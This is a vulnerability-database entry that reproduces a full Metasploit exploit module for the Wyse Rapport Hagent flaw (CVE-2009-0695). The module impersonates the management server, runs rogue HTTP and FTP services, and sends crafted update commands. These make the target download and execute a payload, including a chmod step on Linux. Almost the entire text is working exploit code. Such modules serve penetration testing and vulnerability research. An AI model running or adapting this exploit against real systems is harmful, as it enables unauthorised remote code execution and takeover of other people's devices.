Wyse Rapport Hagent Fake Hserver Command Execution

2009-07-10T00:00:00
ID SSV:18025
Type seebug
Reporter Root
Modified 2009-07-10T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##
# $Id: hagent_untrusted_hsdata.rb
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'timeout'
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::FtpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Wyse Rapport Hagent Fake Hserver Command Execution',
			'Description'    => %q{
				This module exploits the Wyse Rapport Hagent service by pretending to
			be a legitimate server. This process involves starting both HTTP and 
			FTP services on the attacker side, then contacting the Hagent service of
			the target and indicating that an update is available. The target will
			then download the payload wrapped in an executable from the FTP service.
			},
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'Author'         => 'kf',
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2009-0695'],
					['OSVDB', '55839'],
					['US-CERT-VU', '654545'],
					['URL', 'http://snosoft.blogspot.com/'],
					['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
					['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
					['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
				],
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => '',
				},
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Targets'        => 
					[
						[ 'Windows XPe x86',{'Platform' => 'win',}],
						[ 'Wyse Linux x86', {'Platform' => 'linux',}],
					],
			'DefaultTarget'  => 0,
			'Privileged'     => true
		))

		register_options([
			OptPort.new('SRVPORT',    [ true, "The local port to use for the FTP server", 21 ]),
			Opt::RPORT(80),
		], self.class)
	end


	def exploit
	
		if(datastore['SRVPORT'].to_i != 21)
			print_error("This exploit requires the FTP service to run on port 21")
			return
		end
		
		# Connect to the target service
		print_status("Connecting to the target")
		connect()
		
		# Start the FTP service
		print_status("Starting the FTP server")
		start_service()
		
		# Create the executable with our payload
		print_status("Generating the EXE")
		if target['Platform'] == 'win'
			@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
			maldir      = "C:\\"  		# Windows
			malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
			co = "XP"
		elsif  target['Platform'] == 'linux'
			@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
			maldir      = "//tmp//"		# Linux
			malfile     = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
			co = "LXS"
		end
		@exe_sent = false

		# Start the HTTP service
		print_status("Starting the HTTP service")
		wdmserver  = Rex::Socket::TcpServer.create({
			'Context'   => {
				'Msf'        => framework,
				'MsfExploit' => self
			}
		})
		
		wdmserver_port = wdmserver.getsockname[2]
		print_status("Starting the HTTP service on port #{wdmserver_port}")
		
		
		fakerapport = Rex::Socket.source_address(rhost)
		fakemac     = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
		mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"

		# FTP Credentials 
		ftpserver = Rex::Socket.source_address(rhost)
		ftpuser   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
		ftppass   = Rex::Text.rand_text_alphanumeric(rand(8)+1)
		ftpport   = 21
		ftpsecure = '0'

		incr = 10  
		pwn1 = 
		"&UP0|&SI=1|UR=9" +
		"|CO \x0f#{co}\x0f|#{incr}" +
		# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
		"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" 

		pwn2 = 
	 	"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" 

		pwn3 = 
		"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
		# "|RB|#{incr+1}" + 
		# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
		#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + 
		# FTP Paramaters 
		"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
		"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
		# No clue
		"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"

		if target['Platform'] == 'win'
			pwn = pwn1 + pwn3 
		elsif target['Platform'] == 'linux'
			pwn = pwn1 + pwn2 + pwn3 
		end
		# Send the malicious request
		sock.put(mal)
		
		# Download some response data
		resp = sock.get_once(-1, 10) 
		print_status("Received: " + resp)
		
		print_status("Waiting on a connection to the HTTP service")
		begin
			Timeout.timeout(190) do
			done = false
			while (not done and session = wdmserver.accept)
				req = session.recvfrom(2000)[0]
				next if not req
				next if req.empty?
				print_status("HTTP Request: #{req.split("\n")[0].strip}")
				
				case req
  				when /V01/
		   	 		print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
					res = pwn 					
				when /V02/
					print_status("++ device sending V02 query...")
					res  = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
					done = true
					
  				when /V55/
		  	 		print_status("++ device sending V55 query...")
					res = pwn 				
  				when /POST/  # PUT is used for non encrypted requests.
		  	 		print_status("++ device sending V55 query...")
					res = pwn 				
					done = true
				else
					print_status("+++ sending generic response...")
					res = pwn 
				end
				
				print_status("Sending reply: #{res}")
				session.put(res)
  				session.close
			end
			end
		rescue ::TimeoutError
			print_status("Timed out waiting on the HTTP request")
			wdmserver.close
			disconnect()
			stop_service()
			return
		end
		
		print_status("Waiting on the FTP request...")
		stime = Time.now.to_f
		while(not @exe_sent)
			break if (stime + 90 < Time.now.to_f)
			select(nil, nil, nil, 0.25)	
		end
		
		if(not @exe_sent)
			print_status("No executable sent :(")
		end
		
		stop_service()
		wdmserver.close()
		
		handler
		disconnect
	end

	def on_client_command_retr(c,arg)
		print_status("#{@state[c][:name]} FTP download request for #{arg}")
		conn = establish_data_connection(c)
		if(not conn)
			c.put("425 Can't build data connection\r\n")
			return
		end
		
		c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
		conn.put(@exe_file)
		c.put("226 Transfer complete.\r\n")
		conn.close
		@exe_sent = true
	end
	
	def on_client_command_size(c,arg)
		print_status("#{@state[c][:name]} FTP size request for #{arg}")
		c.put("213 #{@exe_file.length}\r\n")
	end


end